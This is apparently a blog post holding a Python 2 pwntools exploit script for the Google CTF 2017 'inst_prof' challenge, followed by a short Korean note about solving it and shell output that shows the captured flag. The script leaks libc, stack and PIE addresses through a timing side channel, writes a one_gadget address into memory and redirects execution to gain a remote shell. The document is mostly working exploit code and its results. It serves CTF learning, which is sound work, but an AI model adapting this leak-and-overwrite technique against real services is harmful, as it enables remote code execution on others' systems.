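"""Remote exploit for Google CTF 2017 ``inst_prof`` (the version posted on the blog).

The service reads 4-byte instruction slots, runs each one 0x1000 times and
answers every slot with an 8-byte timing value.  The script abuses this by
adding a register / memory word into what is presumably the timing base
register (r12) on every iteration, so the returned "timing" is roughly
``-(0x1000 * value)`` modulo 2**64; negating it and dividing by 0x1000
recovers ``value`` (the low bits carry timing noise, hence the ad-hoc
rounding below).  The recovered libc, stack and code addresses are then used
to write a one_gadget address into the binary through r14 and redirect
execution to it.

Caveats: the one_gadget offset (0xe9f2d) belongs to a libc borrowed from a
different challenge, and the 0x5eafff / 0x4000 / 0xb17 / 0x70 / 0x202
constants and the rounding heuristics are specific to that environment.
Against any other build every offset has to be re-derived.  This is a
Python 2 script (print statements, str-as-bytes pwntools API).
"""
from pwn import *

TWO64 = 0x10000000000000000  # 2**64: used to negate the unsigned 8-byte result
ITERS = 0x1000               # how many times the service repeats each slot

# Instruction slots are 4 bytes; shorter encodings are NOP-padded.
pad = lambda x: x.ljust(4, '\x90')
asm_ = lambda x: asm(x, arch='amd64')


def leak_via_r12(insn):
    """Run ``insn`` (which must add the wanted value into r12) and return the
    value recovered from the returned timing.

    recvn() is used rather than recv(): recv(8) may legitimately return a
    short read on a network socket, and u64() would then raise on the
    truncated buffer instead of producing a leak.
    """
    r.send(pad(asm_(insn)))
    return (TWO64 - u64(r.recvn(8))) // ITERS


#r = process('./inst_prof')
r = remote('inst-prof.ctfcompetition.com', 1337)
r.recvuntil('ready\n')

# --- leak 1: rbx holds a libc pointer; the 0x5eafff/0x4000 delta maps it to
# the base of the borrowed libc (see module docstring).
libc = leak_via_r12('add r12, rbx') - 0x5eafff + 0x4000
if libc % 16 != 0:       # empirical noise correction from the original run
    libc += 1
print 'libc    {:#x}'.format(libc)

# --- leak 2: rsp.  stack_obj is the stack slot 0x70 past it that the last
# stage zeroes.  The "% 16 == 6" test differs from the other two rounding
# rules and is kept exactly as the author had it -- confirm before reuse.
stack = leak_via_r12('add r12, rsp')
if stack % 16 == 6:
    stack += 1
print 'stack   {:#x}'.format(stack)
stack_obj = stack + 1 + 0x70

# --- leak 3: [rsp] is the return address into the binary; 0xb17 is its
# offset from the PIE base.
code = leak_via_r12('add r12, QWORD PTR [rsp]') - 0xb17
if code % 16 != 0:
    code += 1
print 'code    {:#x}'.format(code)
# 4 KiB page index of the binary inside its 64 KiB window; compensates the
# r14 construction below.
extra = (code % 0x10000) // 0x1000
print 'extra   {}'.format(extra)

# --- build a write pointer in r14: r14 = [rsp] with its low word replaced by
# dx, bumped by (0x202 + extra) 'inc' slots (each slot presumably runs 0x1000
# times, i.e. +(0x202 + extra) * 0x1000), low byte forced to 0x58.  The exact
# object this lands on is not documented in the original; it is wherever the
# one_gadget address gets written below.
chain = (pad(asm_('mov r14, QWORD PTR [rsp]')) +
         pad(asm_('mov r14w, dx')) +
         pad(asm_('inc r14')) * (0x202 + extra) +
         pad(asm_('mov r14b, 0x58')))
r.send(chain)
r.recvn(8 * (3 + 0x202 + extra))   # one 8-byte result per slot, all discarded

onegadget = libc + 0xe9f2d         # one_gadget of the borrowed libc (alt: 0xf0567)
print 'gadget  {:#x}'.format(onegadget)
raw_input('>')

# --- write the low 6 bytes of the gadget address through r14, one per slot.
# ``{:#x}`` on ``value & 0xff`` replaces hex(value)[-2:]: on Python 2 a long
# renders with a trailing 'L', and a single-digit remainder would also yield
# a broken immediate such as '0xx7'.
remaining = onegadget
for i in range(6):
    r.send(pad(asm_('mov BYTE PTR [r14], {:#x}'.format(remaining & 0xff))))
    remaining >>= 8
    r.send(pad(asm_('mov r14b, {:#x}'.format(0x59 + i))))   # next byte slot
    r.recvn(16)     # two slots -> two 8-byte results, both discarded

# --- second stage: steer r14 at stack_obj and zero its 8 bytes.
r.send(pad(asm_('mov r14, rsp')))
raw_input('?')
lo = stack_obj % 0x100
r.send(pad(asm_('mov r14b, {:#x}'.format(lo))))
raw_input('>>')
# Only the low byte of r14 is steered, so lo + 8 must stay below 0x100 or the
# imm8 below will not assemble (same limitation as the original script).
for i in range(8):
    r.send(pad(asm_('mov BYTE PTR [r14], 0')))
    print 'zeroed stack byte at low offset {:#x}'.format(lo + i)
    r.send(pad(asm_('mov r14b, {:#x}'.format(lo + i + 1))))

# --- finally patch the low byte of the saved return address so the service
# returns into the path that reaches the overwritten pointer.  The results of
# these last slots are deliberately not read: control flow changes here and
# the interactive session picks up whatever the shell prints.
raw_input('>>>>')
r.send(pad(asm_('mov BYTE PTR [rsp], 0x54')))
r.interactive()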










8번째로 풀었다. 의도한 풀이는 아닌 것 같다.

다른 문제에서 가져온 libc로 쉘을 땄다 ㅠ (스크립트의 one_gadget 오프셋 0xe9f2d는 그 libc 기준이므로, 다른 환경에서는 오프셋을 다시 구해야 한다.)


00\x00$ id

uid=1337(user) gid=1337(user) groups=1337(user)

$ ls

flag.txt

inst_prof

$ cat flag.txt

CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}
